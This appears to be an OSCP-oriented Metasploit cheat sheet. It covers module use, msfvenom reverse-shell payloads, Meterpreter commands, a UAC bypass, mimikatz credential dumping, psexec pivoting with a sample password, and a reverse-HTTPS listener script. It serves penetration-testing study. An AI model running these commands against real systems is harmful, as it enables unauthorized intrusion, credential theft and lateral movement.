Metasploit Cheat Sheet

Help link:

Metasploit Unleashed | Metasploit Unleashed - Free Online Ethical Hacking Coursewww.offsec.com

# This is initial SetUp and needed to be done only once. When you run metasploit for first time.
# We will start the database service.
sudo msfdb init

# We will enable postgresql at boot time.
sudo systemctl enable postgresql

# We will start the Metasploit 
sudo msfconsole

# Check if you are connected with database or not.
db_status

Getting familar with command and interface

# To list all avaiable command
help

Creating work space in metasploit

# To list all workspace
workspace

# To switch workspace.
workspace <name_of_available_workspace>

# To create new workspace
# Note You will be automatically switched to that workspace after creation of workspace.
workspace -a <Type_Name_You_Want_To_Give_To_Workspace>

# To Delete a workspace
workspace -d <NameOfWorkSpace>

Understanding Database backend command

# We will use db_nmap to run Nmap in metasploit and store its data in DB.
# Example: db_nmap -A 192.168.246.202

# Suppose you scanned an IP.
# To get list of discovered hosts
hosts

# To discover services from our scan
services

# To discover service from scan on specific port.
services -p <PortNumber>

# To get help.
# you can use "Use" to select the module.
show -h
# example: use exploits

Auxiliary Modules

# Command to show list of auxiliary module
show auxiliary

# Suppose you want to search for auxiliary module related to SMB
search type:auxiliary smb

# To use auxiliary module from result of previous command.
use <NumberFromListing> 
use <FullPath>
# Example: use 56
# Example: use auxiliary/scanner/smb/smb_version

# To get more information about the currently activated module
info
show options
show missing # To display all required but not set value

# To set or unset value.
set RHOSTS 192.168.206.202
# other way: services -p 445 --rhosts
# To unset value
unset RHOSTS

# Then run it.
run

Detecting vulnerability automatically and saving credential

# Some Vulnerability is automatically detected by metasploit which can be listed using below command
vulns

# In metasploit found credential after brute forcing is saved automatically. To list it.
creds

Exploit modules

# Exploit modules most commonly contain exploit code for vulnerable applications and services

# We will set "set SSL false" to avoid SSL issue.

# After running the exploit Session is automically created. We can background the session using key combination "CTRL + z".

# Listing all sessions
sessions -l 

# Switching to particular session.
sessions -i <SessionNumber>
# Example: sessions -i 3

# We can kill the session.
sessions -k <SessionNumber>
# Example: sessions -k 2

# we can also lauch session in background by runing the exploit using:
run -j # This will run as a context of job.

Payload Generation.

Below is online payload generator tool.

Click on "msfvenom" tab.

Online - Reverse Shell Generatorwww.revshells.com

Type of payload

# Non-Staged payload
// Exploit and shell code are sent Together.
// Bigger in size
// In Metasploit, the "/" character is used to denote whether a payload is staged or not.
// Example: shell_reverse_tcp is Non-staged payload.

# Staged payload.
// First exploit is sent then victim connects to attacker machine then shell code is sent.
// Smaller in size.
// Helps in preventing detection by antivirus.
// In Metasploit, the "/" character is used to denote whether a payload is staged or not.
// Example: shell/reverse_tcp is staged payload.

Meterpreter Payload

# Use of Meterpreter payload is not allowed in OSCP Exam.
# Use below command to list the payload.
show payloads
# Example: payload/linux/x64/meterpreter_reverse_tcp

# After getting Meterpreter shell, We can use following command.
help // To get help related to command.

# The commands of Meterpreter are divided into categories such as System Commands, Networking Commands, and File system Commands.

# Basic and Useful command:

sysinfo // To get system information
getuid  // To get server name.

shell // To create a channel with the victim system.
// Press ctrl + z to background the channel.

channel -l // To list the channel
channel -i <ChannelID> // To switch the channel.

## Stdapi: File system Commands 
lpwd # To print local working dirctory.
lcd /home/kali/Downloads # To change Local directory.
download /etc/passwd # To save file from remote to local system.
upload /usr/bin/unix-privesc-check /tmp/ # To upload file from local to remote system.

Executable payloads

Online - Reverse Shell Generatorwww.revshells.com

# Way to search payload:
msfvenom -l payloads --platform windows --arch x64

# We can simpily use online tool mentioned above to create payload.
// Example: msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.2 LPORT=443 -f exe -o nonstaged.exe

// Run in background jobs using command "run -j"
// List the backgrond jobs "jobs"
// You can interacte with it using command "sessions -i <ID>"

Post Exploitation With metasploit.

# Make Sure you gain access using meterpreter payload.
idletime // Check idle time
getsystem // To elevate the privilege when SeImpersonatePrivilege and SeDebugPrivilege are set.

migrate <PID_Of_process_to_migrate> // Done migration to avoid detection.
// We can also start new process and then migrate to that.
execute -H -f notepad // start new process of notepad and then migrate to it.

# We may get shell access as low privilege user. But if the target user is a member of the local administrators group, we can elevate our shell to a high integrity level if we can bypass User Account Control (UAC).

# Use below command to confirm the integrity level of the user.
shell
powershell -ep bypass
Import-Module NtObjectManager
Get-NtTokenIntegrityLevel
# Output: Medium

# Use a post-exploitation module to bypass UAC and gain high integrity.
meterpreter > bg
msf6 exploit(multi/handler) > search UAC
msf6 exploit(multi/handler) > use exploit/windows/local/bypassuac_sdclt
msf6 exploit(windows/local/bypassuac_sdclt) > set SESSION 9
msf6 exploit(windows/local/bypassuac_sdclt) > set LHOST 192.168.119.4
msf6 exploit(windows/local/bypassuac_sdclt) > run

# Verify the integrity level now.
shell
powershell -ep bypass
Get-NtTokenIntegrityLevel
# Output: High

# Now as we have higher integrity level we can use mimikartz to gain the credential.
meterpreter > load kiwi
meterpreter > creds_msv

Pivoting

# We can pivote to other network access of the compromised host.
# First we will add internal network using below command:

route add <SubNet> <SessionID>
# Example: route add 172.16.5.0/24 12
route print // To display the added route.

# Then we can use portscan module to scan the network.
# Example: 
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 172.16.5.200 // Assuming this host is live.
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 445,3389
msf6 auxiliary(scanner/portscan/tcp) > run

# Using Psexec we will get access to the user of SMB. 
# Example: 
msf6 > use exploit/windows/smb/psexec
msf6 exploit(windows/smb/psexec) > set SMBUser luiza
msf6 exploit(windows/smb/psexec) > set SMBPass "BoccieDearAeroMeow1!"
msf6 exploit(windows/smb/psexec) > set RHOSTS 172.16.5.200
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set LPORT 8000
msf6 exploit(windows/smb/psexec) > run

It's important to use a bind shell like windows/x64/meterpreter/bind_tcp when adding a route, as this allows the attacker to connect to the target through the established route. Reverse shells may fail because the target typically lacks a route back to the attacker's network.

# We can also use autoroute module to automatically add routing.
# Below we use autoroute module we need to remove the any route initially added.
route flush
route print // to verify that route is removed.

# To add autoroute module.
msf6 > use multi/manage/autoroute
msf6 post(multi/manage/autoroute) > sessions -l
msf6 post(multi/manage/autoroute) > set SESSION <ID>
msf6 post(multi/manage/autoroute) > run

# Now we can Use psexec or socks proxy for futher enumeration.

# using socks proxy
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf6 auxiliary(server/socks_proxy) > set VERSION 5
msf6 auxiliary(server/socks_proxy) > run -j

# Make sure proxychain4.conf file as below line:
socks5 127.0.0.1 1080

# Now you can use xfreerdp to RDP into the machine from kali linux.
kali@kali:~$ sudo proxychains xfreerdp /v:172.16.5.200 /u:luiza

# Other way:

# we can also setUp port forwarding using meterpreter.
meterpreter > portfwd add -l 3389 -p 3389 -r 172.16.5.200
kali@kali:~$ sudo xfreerdp /v:127.0.0.1 /u:luiza

Automating task using resource script.

# We automate the task using resource script
# We create a file with extention as .rc
# Example: 
echo "use exploit/multi/handler
set PAYLOAD windows/meterpreter_reverse_https
set LHOST 192.168.45.209
set LPORT 443
set AutoRunScript post/windows/manage/migrate 
set ExitOnSession false
run -z -j" > listener.rc

# then we can run script using below command:
sudo msfconsole -q  -r listener.rc

# This will start the listener. 
# Automating process migration helps to avoid situations where our payload is killed prematurely either by defensive mechanisms or the termination of the related process.
# set ExitOnSession to false to ensure that the listener keeps accepting new connections after a session is created.


# Other scripts can be listed from below:
ls -l /usr/share/metasploit-framework/scripts/resource/

set <Value> <data> # Used to set the value.
unset <Value> <data> # Used to unset the value.

PreviousReference (See)NextManual Enumeration

Last updated 1 year ago